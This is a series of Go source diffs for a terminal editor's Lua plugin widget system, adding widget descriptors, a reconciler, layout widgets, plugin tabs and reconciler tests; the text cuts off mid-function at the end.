+			children := make([]widgets.Widget, len(desc.Children))
+			for i, cd := range desc.Children {
+				if i < len(hs.Children) {
+					updateWidget(hs.Children[i], cd, p)
+					children[i] = hs.Children[i]
+				} else {
+					children[i] = createWidget(cd, p)
+				}
+			}
+			hs.Children = children
+		}
+	case WidgetDivider:
+		// nothing to update
+	case WidgetScrollView:
+		if sv, ok := w.(*widgets.ScrollViewWidget); ok {
+			if vs, ok := sv.Child.(*widgets.VStackWidget); ok {
+				children := make([]widgets.Widget, len(desc.Children))
+				for i, cd := range desc.Children {
+					if i < len(vs.Children) {
+						updateWidget(vs.Children[i], cd, p)
+						children[i] = vs.Children[i]
+					} else {
+						children[i] = createWidget(cd, p)
+					}
+				}
+				vs.Children = children
+			}
 		}
 	case WidgetBox:
 		if bw, ok := w.(*widgets.BoxWidget); ok {
@@ -171,6 +208,7 @@ func createLabelWidget(desc WidgetDesc) *widgets.LabelWidget {
 		Badge: desc.Badge,
 		Style: style,
 	})
+	lw.FixedWidth = desc.FixedWidth
 	applyBoxModel(&lw.Box, desc)
 	return lw
 }
@@ -222,6 +260,28 @@ func createVStackWidget(desc WidgetDesc, p *Plugin) *widgets.VStackWidget {
 	return vs
 }
 
+func createHStackWidget(desc WidgetDesc, p *Plugin) *widgets.HStackWidget {
+	children := make([]widgets.Widget, len(desc.Children))
+	for i, cd := range desc.Children {
+		children[i] = createWidget(cd, p)
+	}
+	hs := widgets.NewHStackWidget(children...)
+	hs.Gap = desc.Gap
+	hs.FixedHeight = desc.FixedHeight
+	return hs
+}
+
+func createDividerWidget(desc WidgetDesc) *widgets.DividerWidget {
+	dw := widgets.NewDividerWidget(widgets.DividerConfig{})
+	applyBoxModel(&dw.Box, desc)
+	return dw
+}
+
+func createScrollViewWidget(desc WidgetDesc, p *Plugin) *widgets.ScrollViewWidget {
+	child := createVStackFromDescs(desc.Children, p)
+	return widgets.NewScrollViewWidget(child)
+}
+
 func createBoxWidget(desc WidgetDesc, p *Plugin) *widgets.BoxWidget {
 	var box *widgets.BoxWidget
 	hasSideBorders := desc.BorderTop || desc.BorderBottom || desc.BorderLeft || desc.BorderRight
@@ -244,6 +304,7 @@ func createBoxWidget(desc WidgetDesc, p *Plugin) *widgets.BoxWidget {
 	} else {
 		box = widgets.NewBoxWidget(widgets.BoxModel{})
 	}
+	applyBoxModel(&box.Box, desc)
 	if desc.FixedHeight > 0 {
 		box.FixedHeight = desc.FixedHeight
 	}
@@ -317,6 +378,18 @@ func wireTreeCallbacks(tw *widgets.TreeWidget, desc WidgetDesc, p *Plugin) {
 			}
 		}
 	}
+	if len(desc.KeyCommands) > 0 {
+		kc := desc.KeyCommands
+		tw.Config.OnKey = func(ev *tcell.EventKey, node *widgets.TreeNode) bool {
+			if ev.Key() == tcell.KeyRune {
+				if cmd, ok := kc[ev.Rune()]; ok && tw.Config.OnCommand != nil {
+					tw.Config.OnCommand(cmd, node)
+					return true
+				}
+			}
+			return false
+		}
+	}
 }
 
 func createButtonWidget(desc WidgetDesc, p *Plugin) *widgets.ButtonWidget {
@@ -356,9 +429,13 @@ func wireInputCallbacks(iw *widgets.InputWidget, desc WidgetDesc, p *Plugin) {
 	}
 	if desc.OnSubmit != nil {
 		fn := desc.OnSubmit
+		clearOnSubmit := desc.ClearOnSubmit
 		iw.Config.OnSubmit = func(text string) {
 			if p.State != nil {
 				p.CallLuaFunc(fn, lua.LString(text))
+			}
+			if clearOnSubmit {
+				iw.Clear()
 			}
 		}
 	}

--- a/internal/plugin/widget_builder.go
+++ b/internal/plugin/widget_builder.go
@@ -224,12 +224,23 @@ func createVStackWidget(desc WidgetDesc, p *Plugin) *widgets.VStackWidget {
 
 func createBoxWidget(desc WidgetDesc, p *Plugin) *widgets.BoxWidget {
 	var box *widgets.BoxWidget
-	if desc.Border {
+	hasSideBorders := desc.BorderTop || desc.BorderBottom || desc.BorderLeft || desc.BorderRight
+	if desc.Border || hasSideBorders {
 		borders := term.SingleBorderSet()
 		if p.Borders != nil {
 			borders = *p.Borders
 		}
-		box = widgets.NewBoxWithBorder(borders)
+		if desc.Border {
+			box = widgets.NewBoxWithBorder(borders)
+		} else {
+			box = widgets.NewBoxWidget(widgets.BoxModel{
+				BorderTop:    desc.BorderTop,
+				BorderBottom: desc.BorderBottom,
+				BorderLeft:   desc.BorderLeft,
+				BorderRight:  desc.BorderRight,
+				Borders:      borders,
+			})
+		}
 	} else {
 		box = widgets.NewBoxWidget(widgets.BoxModel{})
 	}

--- a/internal/plugin/widget_builder.go
+++ b/internal/plugin/widget_builder.go
@@ -1,0 +1,194 @@
+package plugin
+
+import (
+	"github.com/eugenioenko/ttt/internal/term"
+	"github.com/eugenioenko/ttt/internal/widgets"
+	lua "github.com/yuin/gopher-lua"
+)
+
+type WidgetState struct {
+	keys    []string
+	items   []widgets.Widget
+	root    *widgets.VStackWidget
+	focus   *widgets.FocusManager
+}
+
+func NewWidgetState() *WidgetState {
+	return &WidgetState{
+		focus: widgets.NewFocusManager(),
+	}
+}
+
+func (ws *WidgetState) Reconcile(descs []WidgetDesc, p *Plugin) *widgets.VStackWidget {
+	newKeys := make([]string, len(descs))
+	newWidgets := make([]widgets.Widget, len(descs))
+
+	for i, desc := range descs {
+		newKeys[i] = desc.Key
+
+		if i < len(ws.keys) && ws.keys[i] == desc.Key {
+			updateWidget(ws.items[i], desc, p)
+			newWidgets[i] = ws.items[i]
+		} else {
+			newWidgets[i] = createWidget(desc, p)
+		}
+	}
+
+	ws.keys = newKeys
+	ws.items = newWidgets
+	ws.root = widgets.NewVStackWidget(newWidgets...)
+	ws.focus.Collect(ws.root)
+	return ws.root
+}
+
+func createWidget(desc WidgetDesc, p *Plugin) widgets.Widget {
+	switch desc.Kind {
+	case WidgetLabel:
+		return createLabelWidget(desc)
+	case WidgetTree:
+		return createTreeWidget(desc, p)
+	case WidgetList:
+		return createListWidget(desc, p)
+	case WidgetButton:
+		return createButtonWidget(desc, p)
+	case WidgetInput:
+		return createInputWidget(desc, p)
+	}
+	return widgets.NewLabelWidget(widgets.LabelConfig{Text: "unknown widget"})
+}
+
+func updateWidget(w widgets.Widget, desc WidgetDesc, p *Plugin) {
+	switch desc.Kind {
+	case WidgetLabel:
+		if lw, ok := w.(*widgets.LabelWidget); ok {
+			lw.Config.Text = desc.Text
+			if desc.TextStyle != "" {
+				lw.Config.Style = resolveStyleName(desc.TextStyle)
+			}
+		}
+	case WidgetTree, WidgetList:
+		if tw, ok := w.(*widgets.TreeWidget); ok {
+			expanded := map[string]bool{}
+			tw.CollectExpanded(expanded)
+			for _, item := range tw.Config.Items {
+				if item.Expanded {
+					expanded[item.ID] = true
+				}
+			}
+			tw.SetItems(desc.Items)
+			tw.RestoreExpanded(expanded)
+			for _, item := range tw.Config.Items {
+				if expanded[item.ID] && item.Expandable {
+					item.Expanded = true
+				}
+			}
+			wireTreeCallbacks(tw, desc, p)
+		}
+	case WidgetButton:
+		if bw, ok := w.(*widgets.ButtonWidget); ok {
+			_ = bw
+			// Button label cannot be changed after construction due to accelerator parsing.
+			// Rewire callback only.
+			wireButtonCallback(bw, desc, p)
+		}
+	case WidgetInput:
+		if iw, ok := w.(*widgets.InputWidget); ok {
+			iw.Config.Placeholder = desc.Placeholder
+			wireInputCallbacks(iw, desc, p)
+		}
+	}
+}
+
+func createLabelWidget(desc WidgetDesc) *widgets.LabelWidget {
+	style := term.StyleDefault
+	if desc.TextStyle != "" {
+		style = resolveStyleName(desc.TextStyle)
+	}
+	return widgets.NewLabelWidget(widgets.LabelConfig{
+		Text:  desc.Text,
+		Style: style,
+	})
+}
+
+func createTreeWidget(desc WidgetDesc, p *Plugin) *widgets.TreeWidget {
+	tw := widgets.NewTreeWidget(widgets.TreeConfig{
+		Items:  desc.Items,
+		Indent: desc.Indent,
+	})
+	wireTreeCallbacks(tw, desc, p)
+	return tw
+}
+
+func createListWidget(desc WidgetDesc, p *Plugin) *widgets.TreeWidget {
+	tw := widgets.NewTreeWidget(widgets.TreeConfig{
+		Items: desc.Items,
+	})
+	wireTreeCallbacks(tw, desc, p)
+	return tw
+}
+
+func wireTreeCallbacks(tw *widgets.TreeWidget, desc WidgetDesc, p *Plugin) {
+	if desc.OnSelect != nil {
+		fn := desc.OnSelect
+		tw.Config.OnSelect = func(node *widgets.TreeNode) {
+			if p.State != nil {
+				tbl := TreeNodeToLua(p.State, node)
+				p.CallLuaFunc(fn, tbl)
+			}
+		}
+	}
+	if desc.OnExpand != nil {
+		fn := desc.OnExpand
+		tw.Config.OnExpand = func(node *widgets.TreeNode) {
+			if p.State != nil {
+				tbl := TreeNodeToLua(p.State, node)
+				p.CallLuaFunc(fn, tbl)
+			}
+		}
+	}
+}
+
+func createButtonWidget(desc WidgetDesc, p *Plugin) *widgets.ButtonWidget {
+	bw := widgets.NewButtonWidget(widgets.ButtonConfig{
+		Label: desc.Label,
+	})
+	wireButtonCallback(bw, desc, p)
+	return bw
+}
+
+func wireButtonCallback(bw *widgets.ButtonWidget, desc WidgetDesc, p *Plugin) {
+	if desc.OnClick != nil {
+		fn := desc.OnClick
+		bw.Config.OnClick = func() {
+			p.CallLuaFunc(fn)
+		}
+	}
+}
+
+func createInputWidget(desc WidgetDesc, p *Plugin) *widgets.InputWidget {
+	iw := widgets.NewInputWidget(widgets.InputConfig{
+		Placeholder: desc.Placeholder,
+		Prefix:      desc.Prefix,
+	})
+	wireInputCallbacks(iw, desc, p)
+	return iw
+}
+
+func wireInputCallbacks(iw *widgets.InputWidget, desc WidgetDesc, p *Plugin) {
+	if desc.OnChange != nil {
+		fn := desc.OnChange
+		iw.Config.OnChange = func(text string) {
+			if p.State != nil {
+				p.CallLuaFunc(fn, lua.LString(text))
+			}
+		}
+	}
+	if desc.OnSubmit != nil {
+		fn := desc.OnSubmit
+		iw.Config.OnSubmit = func(text string) {
+			if p.State != nil {
+				p.CallLuaFunc(fn, lua.LString(text))
+			}
+		}
+	}
+}

--- a/internal/plugin/widget_builder.go
+++ b/internal/plugin/widget_builder.go
@@ -45,6 +45,10 @@ func createWidget(desc WidgetDesc, p *Plugin) widgets.Widget {
 	switch desc.Kind {
 	case WidgetLabel:
 		return createLabelWidget(desc)
+	case WidgetTitle:
+		return createTitleWidget(desc)
+	case WidgetKeyValue:
+		return createKeyValueWidget(desc)
 	case WidgetTree:
 		return createTreeWidget(desc, p)
 	case WidgetList:
@@ -68,9 +72,18 @@ func updateWidget(w widgets.Widget, desc WidgetDesc, p *Plugin) {
 	case WidgetLabel:
 		if lw, ok := w.(*widgets.LabelWidget); ok {
 			lw.Config.Text = desc.Text
+			lw.Config.Badge = desc.Badge
 			if desc.TextStyle != "" {
 				lw.Config.Style = resolveStyleName(desc.TextStyle)
 			}
+		}
+	case WidgetTitle:
+		if tw, ok := w.(*widgets.TitleWidget); ok {
+			tw.Config.Title = desc.Text
+		}
+	case WidgetKeyValue:
+		if kv, ok := w.(*widgets.KeyValueListWidget); ok {
+			kv.Entries = desc.KeyValueEntries
 		}
 	case WidgetTree, WidgetList:
 		if tw, ok := w.(*widgets.TreeWidget); ok {
@@ -137,15 +150,43 @@ func updateWidget(w widgets.Widget, desc WidgetDesc, p *Plugin) {
 	}
 }
 
+func applyBoxModel(box *widgets.BoxModel, desc WidgetDesc) {
+	box.MarginTop = desc.MarginTop
+	box.MarginBottom = desc.MarginBottom
+	box.MarginLeft = desc.MarginLeft
+	box.MarginRight = desc.MarginRight
+	box.PaddingTop = desc.PaddingTop
+	box.PaddingBottom = desc.PaddingBottom
+	box.PaddingLeft = desc.PaddingLeft
+	box.PaddingRight = desc.PaddingRight
+}
+
 func createLabelWidget(desc WidgetDesc) *widgets.LabelWidget {
 	style := term.StyleDefault
 	if desc.TextStyle != "" {
 		style = resolveStyleName(desc.TextStyle)
 	}
-	return widgets.NewLabelWidget(widgets.LabelConfig{
+	lw := widgets.NewLabelWidget(widgets.LabelConfig{
 		Text:  desc.Text,
+		Badge: desc.Badge,
 		Style: style,
 	})
+	applyBoxModel(&lw.Box, desc)
+	return lw
+}
+
+func createTitleWidget(desc WidgetDesc) *widgets.TitleWidget {
+	tw := widgets.NewTitleWidget(widgets.TitleConfig{
+		Title: desc.Text,
+	})
+	applyBoxModel(&tw.Box, desc)
+	return tw
+}
+
+func createKeyValueWidget(desc WidgetDesc) *widgets.KeyValueListWidget {
+	kv := widgets.NewKeyValueListWidget(desc.KeyValueEntries)
+	applyBoxModel(&kv.Box, desc)
+	return kv
 }
 
 func createTreeWidget(desc WidgetDesc, p *Plugin) *widgets.TreeWidget {

--- a/internal/plugin/widget_builder.go
+++ b/internal/plugin/widget_builder.go
@@ -53,6 +53,12 @@ func createWidget(desc WidgetDesc, p *Plugin) widgets.Widget {
 		return createButtonWidget(desc, p)
 	case WidgetInput:
 		return createInputWidget(desc, p)
+	case WidgetVStack:
+		return createVStackWidget(desc, p)
+	case WidgetBox:
+		return createBoxWidget(desc, p)
+	case WidgetDropdown:
+		return createDropdownWidget(desc, p)
 	}
 	return widgets.NewLabelWidget(widgets.LabelConfig{Text: "unknown widget"})
 }
@@ -96,6 +102,38 @@ func updateWidget(w widgets.Widget, desc WidgetDesc, p *Plugin) {
 			iw.Config.Placeholder = desc.Placeholder
 			wireInputCallbacks(iw, desc, p)
 		}
+	case WidgetVStack:
+		if vs, ok := w.(*widgets.VStackWidget); ok {
+			children := make([]widgets.Widget, len(desc.Children))
+			for i, cd := range desc.Children {
+				if i < len(vs.Children) {
+					updateWidget(vs.Children[i], cd, p)
+					children[i] = vs.Children[i]
+				} else {
+					children[i] = createWidget(cd, p)
+				}
+			}
+			vs.Children = children
+		}
+	case WidgetBox:
+		if bw, ok := w.(*widgets.BoxWidget); ok {
+			if len(desc.Children) > 0 {
+				if vs, ok := bw.Child.(*widgets.VStackWidget); ok {
+					children := make([]widgets.Widget, len(desc.Children))
+					for i, cd := range desc.Children {
+						if i < len(vs.Children) {
+							updateWidget(vs.Children[i], cd, p)
+							children[i] = vs.Children[i]
+						} else {
+							children[i] = createWidget(cd, p)
+						}
+					}
+					vs.Children = children
+				} else {
+					bw.Child = createVStackFromDescs(desc.Children, p)
+				}
+			}
+		}
 	}
 }
 
@@ -112,8 +150,9 @@ func createLabelWidget(desc WidgetDesc) *widgets.LabelWidget {
 
 func createTreeWidget(desc WidgetDesc, p *Plugin) *widgets.TreeWidget {
 	tw := widgets.NewTreeWidget(widgets.TreeConfig{
-		Items:  desc.Items,
-		Indent: desc.Indent,
+		Items:    desc.Items,
+		Indent:   desc.Indent,
+		NodeMenu: desc.NodeMenu,
 	})
 	wireTreeCallbacks(tw, desc, p)
 	return tw
@@ -121,10 +160,69 @@ func createTreeWidget(desc WidgetDesc, p *Plugin) *widgets.TreeWidget {
 
 func createListWidget(desc WidgetDesc, p *Plugin) *widgets.TreeWidget {
 	tw := widgets.NewTreeWidget(widgets.TreeConfig{
-		Items: desc.Items,
+		Items:    desc.Items,
+		NodeMenu: desc.NodeMenu,
 	})
 	wireTreeCallbacks(tw, desc, p)
 	return tw
+}
+
+func createVStackFromDescs(descs []WidgetDesc, p *Plugin) *widgets.VStackWidget {
+	children := make([]widgets.Widget, len(descs))
+	for i, cd := range descs {
+		children[i] = createWidget(cd, p)
+	}
+	return widgets.NewVStackWidget(children...)
+}
+
+func createVStackWidget(desc WidgetDesc, p *Plugin) *widgets.VStackWidget {
+	vs := createVStackFromDescs(desc.Children, p)
+	vs.Gap = desc.Gap
+	return vs
+}
+
+func createBoxWidget(desc WidgetDesc, p *Plugin) *widgets.BoxWidget {
+	var box *widgets.BoxWidget
+	if desc.Border {
+		borders := term.SingleBorderSet()
+		if p.Borders != nil {
+			borders = *p.Borders
+		}
+		box = widgets.NewBoxWithBorder(borders)
+	} else {
+		box = widgets.NewBoxWidget(widgets.BoxModel{})
+	}
+	if desc.FixedHeight > 0 {
+		box.FixedHeight = desc.FixedHeight
+	}
+	if len(desc.Children) > 0 {
+		box.Child = createVStackFromDescs(desc.Children, p)
+	}
+	return box
+}
+
+func createDropdownWidget(desc WidgetDesc, p *Plugin) *widgets.DropdownWidget {
+	dd := widgets.NewDropdownWidget(widgets.DropdownConfig{
+		Label:   desc.Label,
+		Entries: desc.Entries,
+		Box:     &widgets.BoxModel{PaddingLeft: 1, PaddingRight: 1},
+	})
+	wireDropdownCallback(dd, desc, p)
+	return dd
+}
+
+func wireDropdownCallback(dd *widgets.DropdownWidget, desc WidgetDesc, p *Plugin) {
+	if p.ShowContextMenu != nil && len(desc.Entries) > 0 {
+		dd.Config.OnMenu = func(entries []widgets.MenuEntry, screenX, screenY int) {
+			p.ShowContextMenu(entries, screenX, screenY, func(cmd string) {
+				if desc.OnMenu != nil {
+					if p.State != nil {
+						p.CallLuaFunc(desc.OnMenu, lua.LString(cmd))
+					}
+				}
+			})
+		}
+	}
 }
 
 func wireTreeCallbacks(tw *widgets.TreeWidget, desc WidgetDesc, p *Plugin) {
@@ -143,6 +241,27 @@ func wireTreeCallbacks(tw *widgets.TreeWidget, desc WidgetDesc, p *Plugin) {
 			if p.State != nil {
 				tbl := TreeNodeToLua(p.State, node)
 				p.CallLuaFunc(fn, tbl)
+			}
+		}
+	}
+	if desc.OnCommand != nil {
+		fn := desc.OnCommand
+		tw.Config.OnCommand = func(command string, node *widgets.TreeNode) {
+			if p.State != nil {
+				tbl := TreeNodeToLua(p.State, node)
+				p.CallLuaFunc(fn, lua.LString(command), tbl)
+			}
+		}
+	}
+	if len(desc.NodeMenu) > 0 {
+		tw.Config.NodeMenu = desc.NodeMenu
+		if p.ShowContextMenu != nil {
+			tw.Config.OnMenu = func(entries []widgets.MenuEntry, node *widgets.TreeNode, sx, sy int) {
+				p.ShowContextMenu(entries, sx, sy, func(cmd string) {
+					if tw.Config.OnCommand != nil {
+						tw.Config.OnCommand(cmd, node)
+					}
+				})
 			}
 		}
 	}

--- a/internal/plugin/widget_builder_test.go
+++ b/internal/plugin/widget_builder_test.go
@@ -1,0 +1,145 @@
+package plugin
+
+import (
+	"testing"
+
+	"github.com/eugenioenko/ttt/internal/widgets"
+	lua "github.com/yuin/gopher-lua"
+)
+
+func TestReconcileCreatesWidgets(t *testing.T) {
+	ws := NewWidgetState()
+	p := &Plugin{Name: "test", State: lua.NewState()}
+	defer p.State.Close()
+
+	descs := []WidgetDesc{
+		{Kind: WidgetLabel, Key: "label:0", Text: "Hello"},
+		{Kind: WidgetTree, Key: "tree:0", Items: []*widgets.TreeNode{
+			{ID: "a", Label: "Alpha"},
+		}},
+		{Kind: WidgetButton, Key: "button:0", Label: "OK"},
+	}
+
+	root := ws.Reconcile(descs, p)
+	if root == nil {
+		t.Fatal("expected non-nil root")
+	}
+	if len(root.Children) != 3 {
+		t.Fatalf("expected 3 children, got %d", len(root.Children))
+	}
+
+	if _, ok := root.Children[0].(*widgets.LabelWidget); !ok {
+		t.Error("expected child 0 to be LabelWidget")
+	}
+	if _, ok := root.Children[1].(*widgets.TreeWidget); !ok {
+		t.Error("expected child 1 to be TreeWidget")
+	}
+	if _, ok := root.Children[2].(*widgets.ButtonWidget); !ok {
+		t.Error("expected child 2 to be ButtonWidget")
+	}
+}
+
+func TestReconcilePreservesTreeState(t *testing.T) {
+	ws := NewWidgetState()
+	p := &Plugin{Name: "test", State: lua.NewState()}
+	defer p.State.Close()
+
+	descs := []WidgetDesc{
+		{Kind: WidgetTree, Key: "tree:0", Items: []*widgets.TreeNode{
+			{ID: "a", Label: "Alpha", Expandable: true, Children: []*widgets.TreeNode{
+				{ID: "a1", Label: "Alpha-1"},
+			}},
+			{ID: "b", Label: "Beta"},
+		}},
+	}
+
+	ws.Reconcile(descs, p)
+
+	tw := ws.items[0].(*widgets.TreeWidget)
+	tw.Config.Items[0].Expanded = true
+
+	descs2 := []WidgetDesc{
+		{Kind: WidgetTree, Key: "tree:0", Items: []*widgets.TreeNode{
+			{ID: "a", Label: "Alpha Updated", Expandable: true, Children: []*widgets.TreeNode{
+				{ID: "a1", Label: "Alpha-1"},
+				{ID: "a2", Label: "Alpha-2"},
+			}},
+			{ID: "b", Label: "Beta"},
+		}},
+	}
+
+	ws.Reconcile(descs2, p)
+
+	tw2 := ws.items[0].(*widgets.TreeWidget)
+	if !tw2.Config.Items[0].Expanded {
+		t.Error("expected node 'a' to remain expanded after reconcile")
+	}
+	if tw2.Config.Items[0].Label != "Alpha Updated" {
+		t.Error("expected label to be updated")
+	}
+}
+
+func TestReconcilePreservesInputText(t *testing.T) {
+	ws := NewWidgetState()
+	p := &Plugin{Name: "test", State: lua.NewState()}
+	defer p.State.Close()
+
+	descs := []WidgetDesc{
+		{Kind: WidgetInput, Key: "input:0", Placeholder: "Type..."},
+	}
+
+	ws.Reconcile(descs, p)
+
+	iw := ws.items[0].(*widgets.InputWidget)
+	iw.SetText("user typed this")
+
+	descs2 := []WidgetDesc{
+		{Kind: WidgetInput, Key: "input:0", Placeholder: "New placeholder"},
+	}
+
+	ws.Reconcile(descs2, p)
+
+	iw2 := ws.items[0].(*widgets.InputWidget)
+	if iw2.Text() != "user typed this" {
+		t.Errorf("expected text preserved, got %q", iw2.Text())
+	}
+	if iw2.Config.Placeholder != "New placeholder" {
+		t.Errorf("expected placeholder updated, got %q", iw2.Config.Placeholder)
+	}
+}
+
+func TestReconcileHandlesTypeChange(t *testing.T) {
+	ws := NewWidgetState()
+	p := &Plugin{Name: "test", State: lua.NewState()}
+	defer p.State.Close()
+
+	descs1 := []WidgetDesc{
+		{Kind: WidgetLabel, Key: "label:0", Text: "Hello"},
+		{Kind: WidgetTree, Key: "tree:0"},
+	}
+	ws.Reconcile(descs1, p)
+
+	descs2 := []WidgetDesc{
+		{Kind: WidgetLabel, Key: "label:0", Text: "Hello"},
+		{Kind: WidgetButton, Key: "button:0", Label: "Click"},
+	}
+	ws.Reconcile(descs2, p)
+
+	if _, ok := ws.items[1].(*widgets.ButtonWidget); !ok {
+		t.Error("expected child 1 to be replaced with ButtonWidget")
+	}
+}
+
+func TestReconcileEmptyDescriptors(t *testing.T) {
+	ws := NewWidgetState()
+	p := &Plugin{Name: "test", State: lua.NewState()}
+	defer p.State.Close()
+
+	root := ws.Reconcile(nil, p)
+	if root == nil {
+		t.Fatal("expected non-nil root even with empty descriptors")
+	}
+	if len(root.Children) != 0 {
+		t.Errorf("expected 0 children, got %d", len(root.Children))
+	}
+}

--- a/internal/plugin/widget_desc.go
+++ b/internal/plugin/widget_desc.go
@@ -13,6 +13,9 @@ const (
 	WidgetList
 	WidgetButton
 	WidgetInput
+	WidgetVStack
+	WidgetBox
+	WidgetDropdown
 )
 
 func (k WidgetKind) String() string {
@@ -27,6 +30,12 @@ func (k WidgetKind) String() string {
 		return "button"
 	case WidgetInput:
 		return "input"
+	case WidgetVStack:
+		return "vstack"
+	case WidgetBox:
+		return "box"
+	case WidgetDropdown:
+		return "dropdown"
 	}
 	return "unknown"
 }
@@ -38,10 +47,12 @@ type WidgetDesc struct {
 	Text      string
 	TextStyle string
 
-	Items    []*widgets.TreeNode
-	Indent   int
-	OnSelect *lua.LFunction
-	OnExpand *lua.LFunction
+	Items     []*widgets.TreeNode
+	Indent    int
+	OnSelect  *lua.LFunction
+	OnExpand  *lua.LFunction
+	OnCommand *lua.LFunction
+	NodeMenu  []widgets.MenuEntry
 
 	Label   string
 	OnClick *lua.LFunction
@@ -50,4 +61,12 @@ type WidgetDesc struct {
 	Prefix      string
 	OnChange    *lua.LFunction
 	OnSubmit    *lua.LFunction
+
+	Children    []WidgetDesc
+	Border      bool
+	FixedHeight int
+	Gap         int
+
+	Entries []widgets.MenuEntry
+	OnMenu  *lua.LFunction
 }

--- a/internal/plugin/widget_desc.go
+++ b/internal/plugin/widget_desc.go
@@ -78,10 +78,14 @@ type WidgetDesc struct {
 	OnChange    *lua.LFunction
 	OnSubmit    *lua.LFunction
 
-	Children    []WidgetDesc
-	Border      bool
-	FixedHeight int
-	Gap         int
+	Children     []WidgetDesc
+	Border       bool
+	BorderTop    bool
+	BorderBottom bool
+	BorderLeft   bool
+	BorderRight  bool
+	FixedHeight  int
+	Gap          int
 
 	Entries         []widgets.MenuEntry
 	OnMenu         *lua.LFunction

--- a/internal/plugin/widget_desc.go
+++ b/internal/plugin/widget_desc.go
@@ -18,6 +18,9 @@ const (
 	WidgetDropdown
 	WidgetTitle
 	WidgetKeyValue
+	WidgetScrollView
+	WidgetHStack
+	WidgetDivider
 )
 
 func (k WidgetKind) String() string {
@@ -42,6 +45,12 @@ func (k WidgetKind) String() string {
 		return "title"
 	case WidgetKeyValue:
 		return "keyvalue"
+	case WidgetScrollView:
+		return "scrollview"
+	case WidgetHStack:
+		return "hstack"
+	case WidgetDivider:
+		return "divider"
 	}
 	return "unknown"
 }
@@ -68,15 +77,17 @@ type WidgetDesc struct {
 	OnSelect  *lua.LFunction
 	OnExpand  *lua.LFunction
 	OnCommand *lua.LFunction
-	NodeMenu  []widgets.MenuEntry
+	NodeMenu    []widgets.MenuEntry
+	KeyCommands map[rune]string
 
 	Label   string
 	OnClick *lua.LFunction
 
-	Placeholder string
-	Prefix      string
-	OnChange    *lua.LFunction
-	OnSubmit    *lua.LFunction
+	Placeholder    string
+	Prefix         string
+	OnChange       *lua.LFunction
+	OnSubmit       *lua.LFunction
+	ClearOnSubmit  bool
 
 	Children     []WidgetDesc
 	Border       bool
@@ -85,6 +96,7 @@ type WidgetDesc struct {
 	BorderLeft   bool
 	BorderRight  bool
 	FixedHeight  int
+	FixedWidth   int
 	Gap          int
 
 	Entries         []widgets.MenuEntry

--- a/internal/plugin/widget_desc.go
+++ b/internal/plugin/widget_desc.go
@@ -16,6 +16,8 @@ const (
 	WidgetVStack
 	WidgetBox
 	WidgetDropdown
+	WidgetTitle
+	WidgetKeyValue
 )
 
 func (k WidgetKind) String() string {
@@ -36,6 +38,10 @@ func (k WidgetKind) String() string {
 		return "box"
 	case WidgetDropdown:
 		return "dropdown"
+	case WidgetTitle:
+		return "title"
+	case WidgetKeyValue:
+		return "keyvalue"
 	}
 	return "unknown"
 }
@@ -46,6 +52,16 @@ type WidgetDesc struct {
 
 	Text      string
 	TextStyle string
+	Badge     string
+
+	MarginTop    int
+	MarginBottom int
+	MarginLeft   int
+	MarginRight  int
+	PaddingTop    int
+	PaddingBottom int
+	PaddingLeft   int
+	PaddingRight  int
 
 	Items     []*widgets.TreeNode
 	Indent    int
@@ -67,6 +83,7 @@ type WidgetDesc struct {
 	FixedHeight int
 	Gap         int
 
-	Entries []widgets.MenuEntry
-	OnMenu  *lua.LFunction
+	Entries         []widgets.MenuEntry
+	OnMenu         *lua.LFunction
+	KeyValueEntries []widgets.KeyValueEntry
 }

--- a/internal/plugin/widget_desc.go
+++ b/internal/plugin/widget_desc.go
@@ -1,0 +1,53 @@
+package plugin
+
+import (
+	"github.com/eugenioenko/ttt/internal/widgets"
+	lua "github.com/yuin/gopher-lua"
+)
+
+type WidgetKind int
+
+const (
+	WidgetLabel WidgetKind = iota
+	WidgetTree
+	WidgetList
+	WidgetButton
+	WidgetInput
+)
+
+func (k WidgetKind) String() string {
+	switch k {
+	case WidgetLabel:
+		return "label"
+	case WidgetTree:
+		return "tree"
+	case WidgetList:
+		return "list"
+	case WidgetButton:
+		return "button"
+	case WidgetInput:
+		return "input"
+	}
+	return "unknown"
+}
+
+type WidgetDesc struct {
+	Kind WidgetKind
+	Key  string
+
+	Text      string
+	TextStyle string
+
+	Items    []*widgets.TreeNode
+	Indent   int
+	OnSelect *lua.LFunction
+	OnExpand *lua.LFunction
+
+	Label   string
+	OnClick *lua.LFunction
+
+	Placeholder string
+	Prefix      string
+	OnChange    *lua.LFunction
+	OnSubmit    *lua.LFunction
+}

--- a/internal/ui/editor_group.go
+++ b/internal/ui/editor_group.go
@@ -275,6 +275,47 @@ func (g *EditorGroupWidget) OpenDiff(path string, fd diff.FileDiff, oldLines, ne
 	g.SwitchTab(len(g.tabs) - 1)
 }
 
+func (g *EditorGroupWidget) OpenPluginTab(id string, content Widget) {
+	for i, t := range g.tabs {
+		if t.FilePath == id {
+			t.Content = content
+			g.tabs[i] = t
+			g.SwitchTab(i)
+			return
+		}
+	}
+	g.tabs = append(g.tabs, editorTab{
+		FilePath: id,
+		Content:  content,
+		Pinned:   true,
+	})
+	g.SwitchTab(len(g.tabs) - 1)
+}
+
+func (g *EditorGroupWidget) ClosePluginTab(id string) {
+	for i, t := range g.tabs {
+		if t.FilePath == id {
+			g.tabs = append(g.tabs[:i], g.tabs[i+1:]...)
+			if len(g.tabs) == 0 {
+				g.tabs = []editorTab{{
+					FilePath: "untitled",
+					Buf:      &buffer.Buffer{Lines: []string{""}},
+					Cur:      &cursor.Cursor{},
+					Vp:       &view.Viewport{},
+					Undo:     &undo.UndoStack{},
+					Sel:      &selection.Selection{},
+					Virtual:  true,
+				}}
+				g.active = 0
+			} else if g.active >= len(g.tabs) {
+				g.active = len(g.tabs) - 1
+			}
+			g.syncTabs()
+			return
+		}
+	}
+}
+
 func (g *EditorGroupWidget) ReloadFile(path string) {
 	for i := range g.tabs {
 		if g.tabs[i].FilePath == path && g.tabs[i].Buf != nil {

--- a/internal/ui/output_widget.go
+++ b/internal/ui/output_widget.go
@@ -1,0 +1,121 @@
+package ui
+
+import (
+	"fmt"
+
+	"github.com/eugenioenko/ttt/internal/term"
+	"github.com/eugenioenko/ttt/internal/widgets"
+	"github.com/gdamore/tcell/v2"
+)
+
+type OutputLine struct {
+	Time       string
+	PluginName string
+	Level      string
+	Message    string
+}
+
+type OutputWidget struct {
+	Lines      []OutputLine
+	autoScroll bool
+	tree       *widgets.TreeWidget
+}
+
+func NewOutputWidget() *OutputWidget {
+	o := &OutputWidget{autoScroll: true}
+	o.tree = widgets.NewListWidgetFromConfig(widgets.ListConfig{
